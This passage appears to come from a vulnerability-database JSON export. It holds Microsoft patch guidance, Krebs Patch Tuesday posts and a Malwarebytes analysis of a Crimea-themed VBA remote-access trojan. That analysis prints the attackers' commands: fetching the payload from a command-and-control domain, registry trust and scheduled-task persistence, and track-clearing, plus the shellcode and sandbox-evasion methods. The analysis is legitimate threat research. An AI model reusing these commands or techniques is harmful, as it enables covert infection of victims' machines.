\n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001078) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000803>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000803](<https://download.microsoft.com/download/7/5/6/756f589c-b505-4341-b064-3f5e93f08aee/5000803.csv>). 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000803 (OS Build 14393.4283)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000803", "href": "https://support.microsoft.com/en-us/help/5000803", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-03-18T09:57:50", "description": "On the off chance you were looking for more security to-dos from **Microsoft **today\u2026the company released software updates to plug more than 82 security flaws in Windows and other supported software. 
Ten of these earned Microsoft's "critical" rating, meaning they can be exploited by malware or miscreants with little or no help from users.\n\n\n\nTop of the heap this month (apart from the [ongoing, global Exchange Server mass-compromise](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>)) is a patch for an **Internet Explorer** bug that is seeing active exploitation. The IE weakness -- [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>) -- affects both IE11 and newer EdgeHTML-based versions, and it allows attackers to run a file of their choice by getting you to view a hacked or malicious website in IE.\n\nThe IE flaw is tied to a vulnerability that was publicly disclosed in early February by researchers at [ENKI](<http://enki.co.kr/blog/2021/02/04/ie_0day.html>) who claim it was one of those [used in a recent campaign by nation-state actors to target security researchers](<https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/>). In the ENKI blog post, the researchers said they will publish proof-of-concept (PoC) details after the bug has been patched.\n\n"As we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits," said **Satnam Narang**, staff research engineer at **Tenable**. 
"We strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible."\n\nThis is probably a good place to quote [Ghacks.net's Martin Brinkman](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>): This is [the last patch hurrah](<https://www.ghacks.net/2021/01/31/reminder-microsoft-edge-legacy-will-be-retired-in-march-2021/>) for the legacy Microsoft Edge web browser, which is being retired by Microsoft.\n\nFor the second month in a row, Microsoft has patched scary flaws in the DNS servers on **Windows Server 2008** through **2019** versions that could be used to remotely install software of the attacker\u2019s choice. All five of the DNS bugs quashed in today's patch batch earned a CVSS Score (danger metric) of 9.8 -- almost as bad as it gets.\n\n"There is the outside chance this could be wormable between DNS servers," warned Trend Micro's **Dustin Childs**.\n\nAs mentioned above, hundreds of thousands of organizations are in the midst dealing with a security nightmare after having their Exchange Server and Outlook Web Access (OWA) hacked and retrofitted with a backdoor. If an organization you know has been affected by this attack, please have them check with the new victim notification website [mentioned in today's story](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>).\n\n**Susan Bradley** over at [Askwoody.com says](<https://www.askwoody.com/2021/march-patching-madness-begins/>) "nothing in the March security updates (besides the Exchange ones released last week) is causing me to want to urge you to go running to your machines and patch at this time." I'd concur, unless of course you cruise the web with older Microsoft browsers.\n\n**Update, Mar. .11, 9:32 a.m.: **AskWoody now says any delay in patching may have been warranted. "We are seeing issues with printing after the March updates. 
Ghacks reports BSODs are being triggered after printing. It\u2019s unclear if it\u2019s all of the March operating system updates or just the Windows 10 versions. Note it appears that Microsoft has pulled the updates from Windows update but NOT from WSUS or the catalog site."\n\n_Original story:_\n\nIt\u2019s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it\u2019s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.\n\nBut before you update, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nAdditional reading:\n\nMartin Brinkman's [always comprehensive take](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>).\n\nThe **SANS Internet Storm Center** 
[no-frills breakdown of the fixes](<https://isc.sans.org/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T01:42:39", "type": "krebs", "title": "Microsoft Patch Tuesday, March 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-10T01:42:39", "id": "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "href": "https://krebsonsecurity.com/2021/03/microsoft-patch-tuesday-march-2021-edition/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-27T10:06:23", "description": "**Microsoft** today released updates to plug at least 120 security holes in its **Windows** operating systems and supported software, including two newly discovered vulnerabilities that are actively being exploited. 
Yes, good people of the Windows world, it's time once again to backup and patch up!\n\nAt least 17 of the bugs squashed in August's patch batch address vulnerabilities Microsoft rates as "critical," meaning they can be exploited by miscreants or malware to gain complete, remote control over an affected system with little or no help from users. This is the sixth month in a row Microsoft has shipped fixes for more than 100 flaws in its products.\n\nThe most concerning of these appears to be [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>), which is a weakness in **Internet Explorer** that could result in system compromise just by browsing with IE to a hacked or malicious website. Microsoft's advisory says this flaw is currently being exploited in active attacks.\n\nThe other flaw enjoying active exploitation is [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>), which is a "spoofing" bug in virtually all supported versions of Windows that allows an attacker to bypass Windows security features and load improperly signed files. For more on this flaw, see [Microsoft Put Off Fixing Zero for 2 Years](<https://krebsonsecurity.com/2020/08/microsoft-put-off-fixing-zero-day-for-2-years/>).\n\n**Trend Micro's Zero Day Initiative** points to another fix -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) -- which involves a critical issue in **Windows Server** versions that could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. 
A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n"It\u2019s rare to see a Critical-rated elevation of privilege bug, but this one deserves it," said ZDI'S **Dustin Childs**. "What\u2019s worse is that there is not a full fix available."\n\nPerhaps the most "[elite](<https://en.wikipedia.org/wiki/Leet>)" vulnerability addressed this month earned the distinction of being named [CVE-2020-1337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337>), and refers to a security hole in the **Windows Print Spooler** service that could allow an attacker or malware to escalate their privileges on a system if they were already logged on as a regular (non-administrator) user.\n\n**Satnam Narang** at **Tenable** notes that CVE-2020-1337 is a patch bypass for [CVE-2020-1048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048>), another Windows Print Spooler vulnerability that was patched in May 2020. Narang said researchers found that the patch for CVE-2020-1048 was incomplete and presented their findings for CVE-2020-1337 at the **Black Hat** security conference earlier this month. More information on CVE-2020-1337, including a video demonstration of a proof-of-concept exploit, is available [here](<https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/>).\n\n**Adobe** has graciously given us another month's respite from patching **Flash Player** flaws, but it did release critical security updates for its **Acrobat** and **PDF Reader** products. 
More information on those updates is available [here](<https://helpx.adobe.com/security/products/acrobat/apsb20-48.html>).\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd as ever, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-11T20:55:02", "type": "krebs", "title": "Microsoft Patch Tuesday, August 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1337", "CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1472"], "modified": "2020-08-11T20:55:02", "id": "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "href": "https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-02T20:33:41", "description": "_This blog post was authored by Hossein Jazi._\n\nOn July 21, 2021, we identified a suspicious document named "\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx" ("Manifest.docx") that downloads and executes two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit.\n\nWhile both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery. The attackers may have wanted to combine a social engineering technique with a known exploit to maximize their chances of infecting targets.\n\nWe also uncovered a panel used by the threat actor nicknamed "Ekipa" which seems to be a slang for "equipment". Victims are tracked and statistics include whether the IE exploit was successful or not.\n\nWe could not determine who might be behind this attack based on the techniques alone, but a decoy document displayed to victims may give some clues. 
It contains a statement from a group associating with Andrey Sergeevich Portyko and opposed to Putin's policies on the Crimean peninsula.\n\n### Remote templates\n\nBy looking closer at the remote template embedded in `settings.xml.rels` we noticed that it contains a full featured VBA Rat that performs the following actions:\n\n * Collects victim's info\n * Identifies the AV product running on a victim's machine\n * Executes shell-codes\n * Deletes files\n * Uploads and downloads files \n * Reads disk and file systems information\n\nThe second template is embedded in `Document.xml.rels` and is loaded into the document. Looking at the loaded code we noticed that it contains an [IE Exploit (CVE-2021-26411)](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) that was once used by Lazarus APT to target security researchers working on vulnerability disclosure, as reported by the threat research teams at [Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) and [Microsoft](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>). The shell-code executed using this exploit deploys the same VBA Rat that was loaded using remote template injection. \n\nAfter loading the remote templates the malicious document loads a decoy document in Russian which is pretty interesting. The decoy document is a statement from a group within Crimea that voices opposition to Russia and specifically Putin's policies against that peninsula. In the following, you can see this statement in both Russian and English language.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/decoy-2-1.png> \"\" )Figure 1: Decoy document\n\n### Document Analysis\n\nThe malicious document ("\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx") contains two templates in `settings.xml.rels` and `document.xml.rels`. 
The remote template that is located in `settings.xml.rels` downloads a macro weaponized template and loads it into the current document. This remote template contains macro code with full-featured Rat functionality. We provide the analysis of this VBA Rat in the next section.\n \n \n <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n <Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate\" Target=\"HtTpS:\\\\cloud-documents.com/doc/t.php?action=show_content\" TargetMode=\"External\"/></Relationships>\n\nThe second template is embedded in `document.xml.rels` and will be loaded in an object in the main document. This template contains exploit code for CVE-2021-26411.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/doc.rels_.xml_-1.png> \"\" )Figure 2: Document.xml.rels\n\nThe exploit code used by this remote template is very similar to what has been reported by the [ENKI](<https://enki.co.kr/blog/2021/02/04/ie_0day>) security firm. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/zero-day-1.png> \"\" )Figure 3: Exploit code\n\nThe shell-code executed by this exploit deploys the same VBA Rat that is also loaded using the remote template embedded in `settings.xml.rels`. In fact, the actor tries to deploy its VBA Rat using two different methods. \nThe shell-code is very simple and performs the following actions. The shell-code is written in the [AutoHotKey](<https://www.autohotkey.com/docs/Language.htm>) scripting language and all of its actions are executed using the `SendInput` API call. \n\n * Adds the VBA Rat as a trusted document to the TrustedRecords registry key. With the Rat added to this registry key, there is no need to enable the macro the next time this document is opened. 
\n`reg add \\\"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\16.0\\\\Word\\\\Security\\\\Trusted Documents\\\\TrustRecords\\\" /V https://cloud-documents.com/doc/templates/agent.dotm /t REG_BINARY /d 00000000000000000040230e43000000f9d99c01ffffff7f /f\"`\n * Get the VBA Rat using: `Winword /w https://cloud-documents.com/doc/t.php?document_show=notica`\n * Make this VBA Rat persistent by creating a scheduled task to execute it every minute: \n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n * Delete the `RunMru` registry value to clear its tracks. \n`Reg delete HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMru \\f`\n\n### VBA Rat analysis (Remote Template)\n\nThe remote template contains `Document_Open` and `Document_Close` which are activated upon opening and closing the document. \n\n#### Document_Open:\n\nThe `Document_open` function checks if the active document has the docx extension and if that is the case it shows the hidden content (decoy content). Then, if the active document name is `\"_.dotm\"` (this is the case when the machine is already infected with this Rat), it calls the `\"ConnectCP\"` function. The `ConnectCP` function is responsible for collecting the victim's info by calling the following functions as well as a value named `\"cve\"` in `CustomDocumentProperties` (this value is set during the first execution of this document).\n\nAfter collecting data, it converts it into JSON format by using the `JsonConvertor` function. The collected data is later used by the `SCI` function to be sent to the server and receive commands. 
\n\n * getUUID: Gets UUID by executing `\"SELECT * FROM Win32_ComputerSystemProduct\"`\n * getOS: Gets OS type by executing `\"SELECT * FROM Win32_OperatingSystem\"`\n * arch: Returns OS architecture\n * getCPU: Gets CPU info by executing `\"SELECT * FROM Win32_Processor\"`\n * getGPU: Gets GPU info by executing `\"SELECT * FROM Win32_VideoController\"`\n * getRAM: Gets physical memory capacity by executing `\"SELECT * FROM Win32_PhysicalMemory\"`\n * getStorage: Gets available hard drive space by executing `\"Select * from Win32_LogicalDisk Where DriveType = 3\"`\n * getName: Gets computer name, user name and domain name\n * getRole: Identifies whether the victim has the admin role or not.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getrole-1.png> \"\" )Figure 4: GetRole\n\n * getAV: Gets Anti-Virus product info including the AV name, AV status (enabled or disabled) and AV signature status (outdated or actual). To get this info it executes `\"Select * from AntiVirusProduct\"` to get the list of active Anti Virus products, then calls `DisplayName` to get the AV name, and then identifies the AV status and AV signature status using the product state codes. As an example, if the product state code is 266240, it means that the AV product is enabled and its signature is updated. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getav-5.png> \"\" )Figure 5: GetAV\n\nAt the end, the `ConnectCP` function calls the `StartTimer` function to start the task execution procedure (`ExecuteTasks` function). 
This function creates a timer that calls the `ExecuteTasks` function every 10 minutes to execute the tasks received from the server.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/timer-1.png> \"\" )Figure 6: Set Timer\n\nIf the active document name is not `\"_.dotm\"` (the machine has not been infected before with this VBA Rat), it calls a function named `InstallFromExp` after making sure it is not running within a sandbox environment and its extension is `dotm`. The attacker checks the value of the following registry key and if the value is equal to one it won't execute `InstallFromExp`.\n \n \n HKCU\\Software\\Microsoft\\Office\\&Application.Version&\\Excel\\Security\\VBAWarnings\n\nThe value one for this registry key means that all untrusted and trusted macros are allowed to run without any notification, which is usually a default setting for sandbox environments to run macro embedded documents automatically. \n\n`InstallFromExp` performs the basic initialization of this Rat which includes the following three actions: \n\n * Sets the `customDocumentProperties` named `\"cve\"` to "2021-26411".\n * Makes itself persistent by adding itself to the Word startup directory under the name `\"_.dotm\"`: `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Cleans up its tracks by deleting the `RunMRU` registry key\n * Exits the program\n\n#### **Document_Close**\n\nThis function also performs the installation of the Rat but by calling a different function: `InstallFromMacro`. 
Before calling the installation function it calls the same `Sandbox` function to make sure it is not running in a sandbox environment and then checks if the path of the attached template includes `http` to make sure it has an embedded remote template URL.\n\n`InstallFromMacro` performs initialization of the Rat which includes the following three actions:\n\n * Opens the attached remote template as a document, extracts the contents of the comments section of the BuiltInDocumentProperties and splits it by "|". If the OS is 32 bit it takes the first part of the comments and puts it in the `skd` variable and if the OS is 64 bit it takes the second part of the comments section and puts it into `skd`. The `skd` variable is later used as a parameter for the `AddTask` function.\n * Sets the `customDocumentProperties` named "cve" to "MACRO".\n * Makes itself persistent by adding itself to the Word startup directory under the name "_.dotm": `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Calls the `AddTask` function\n * Cleans up its tracks by deleting the `RunMRU` registry key\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/installrat.png> \"\" )Figure 7: Rat installation\n\n### AddTask (Shell-Code execution using EnumWindows)\n\nThis function base64 decodes the content from the `skd` variable that has been set in the `InstallFromMacro` function and executes it using `VirtualProtect` and `EnumWindows`. In fact the content of `skd` is a small shell-code that is executed in memory without being written to disk. The actor has used an interesting API call for shell-code execution. Instead of using well-known API calls for shell-code execution such as `VirtualAlloc`, `WriteProcessMemory`, and `CreateThread`, which can easily get flagged by AV products, the actor has used `EnumWindows` to execute its shell-code.\n\nThe second argument of `EnumWindows` is an application-defined value to be passed to the callback function. 
By providing the address of the shell-code from `VirtualProtect` as second parameter to this function, it can execute the Shell-code.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/addtask-1.png> \"\" )Figure 8: AddTask\n\nThe executed shell-code is very small and it just persists by creating a Scheduled task to execute it every minute:\n\n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n\nSimilar to the shell-code used in IE exploit, this shell-code is also written using AutoHotKey scripting language and it is using `SendmessageA` and `SendInput` to simulate keystrokes and perform its actions. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/shellcode.png> \"\" )Figure 9: Shell-code API and function calls resolving \n\n### ExecuteTasks\n\nThis is the main function of this VBA Rat that receives the command from the server in Json format and then parses the json file and executes the command. Each time this function can execute three tasks. This has probably been set to avoid making noise in network activities which might be detected by security products. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/ExecuteTasks-1.png> \"\" )Figure 10: Executes tasks\n\nTo receive the tasks from the server this function receives one argument which is a function named `SCI`. `SCI` function sends the collected data by `ConnectCP` function in json format in a `HTTP POST` request and receives the response from the server which includes the tasks that need to be executed in JSON format.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/sci-2.png> \"\" )Figure 11: Send info to server and receive commands\n\nHere is the list of commands that can be executed by this Rat. 
After executing each task, the results of the task execution are sent to the server.\n\n#### ReadDisks\n\nIt gets information about each drive on the machine using the `Scripting.FileSystemObject.Drives` object. It then creates a JSON object which includes the following keys and values for each drive object:\n\n * IsReady: this value is set to true if the drive is ready\n * Label: gets the name of the drive, which will be either ShareName or VolumeName. This depends on whether the drive is remote or not\n * Filesystem: gets the file system in use for the drive\n * Freespace: gets the amount of free space for the drive in KB\n * Name: gets the drive letter\n * IsDirectory: This value is always True\n\nFigure 12: Read Disks\n\n#### ReadFileSystem\n\nThis function gets a Folder object corresponding to the folder in a specified path using the `Scripting.FileSystemObject.GetFolder` object, then extracts its name, size and date last modified and puts them into a JSON object. It also extracts the same information for all sub-folders and files in that Folder object and adds them to the JSON object.\n\n#### Download File\n\nThis function reads a specified file using `Adobe.Recordset` and sends the data to the server using an HTTP POST request.\n\nFigure 13: Download File\n\n#### Upload File\n\nThis module receives a file from the server and writes it into the specified file.\n\nFigure 14: Upload File\n\n#### DeleteFile\n\nThis function uses the Kill function to delete the specified file or directory. 
\n\n#### Terminate\n\nThis function terminates the execution of the Rat and exits the application.\n\n#### Execute\n\nThis function executes the shell-code received from the server using the same method as the `AddTask` function, in which it uses `VirtualProtect` and `EnumWindows` to execute the shell-code.\n\nFigure 15: Execute Shell-code\n\n#### ChangeTiming\n\nThis function resets the timer that is used to execute tasks every 10 minutes by calling `EndTimer` to kill the timer and then calling `StartTimer` to start a new timer.\n\nFigure 16: Send results\n\n### Attacker panel\n\nWe were able to access the panel used by the attacker. The panel's main page includes the list of victims with some information about them, including: IP address, date and time, NTLM, Windows version, Windows Architecture, Office version, Office architecture, IE version, Exploited (shows if the IE zero day was successful or not), Loader (shows if the VBA Rat successfully executed or not) and note.\n\nFigure 17: The panel\n\nThe panel is written in PHP and backed by a SQL database to store data. The `install.php` file initializes the SQL database.\n\nFigure 18: Install.php\n\n`stats.php` is the file that performs the main actions of this Rat that matches the functionalities we reported here. 
It also has some more functions including: `delete_task`, `disable_task`, `enable_task`, `show_tasks`, `add_task`, `format_task` and `add_user`.\n\nFigure 19: Stats.php\n\nFigure 20: Stats.php\n\n### Conclusion\n\nIn this blog post we have analyzed an attack in which threat actors have used two different methods to infect their victims. Both techniques have been loaded by malicious documents using the template injection technique. The first template contains a URL to download a remote template that has an embedded full-featured VBA Rat. This Rat has several different capabilities including downloading, uploading and executing files. The second template is an exploit for CVE-2021-26411 which executes a shell-code to deploy the same VBA Rat. The VBA Rat is not obfuscated but still uses some interesting techniques for shell-code injection.\n\nAs the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well. The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag. 
\n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/blockcrima.png> \"\" )\n\n### IOCs\n\n**Maldocs: \n**03eb08a930bb464837ede77df6c66651d526bab1560e7e6e0e8466ab23856bac \n0661fc4eb09e99ba4d8e28a2d5fae6bb243f6acc0289870f9414f9328721010a \n \n**Remote template:** \nfffe061643271155f29ae015bca89100dec6b4b655fe0580aa8c6aee53f34928 \n \n**C2 server:** \ncloud-documents[.]com\n\nThe post [Crimea "manifesto" deploys VBA Rat using double attack vectors](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-29T15:00:00", "type": "malwarebytes", "title": "Crimea \u201cmanifesto\u201d deploys VBA Rat using double attack vectors", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:00:00", "id": "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "href": 
"https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Internet Explorer contains an unspecified vulnerability which allows for memory corruption.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": 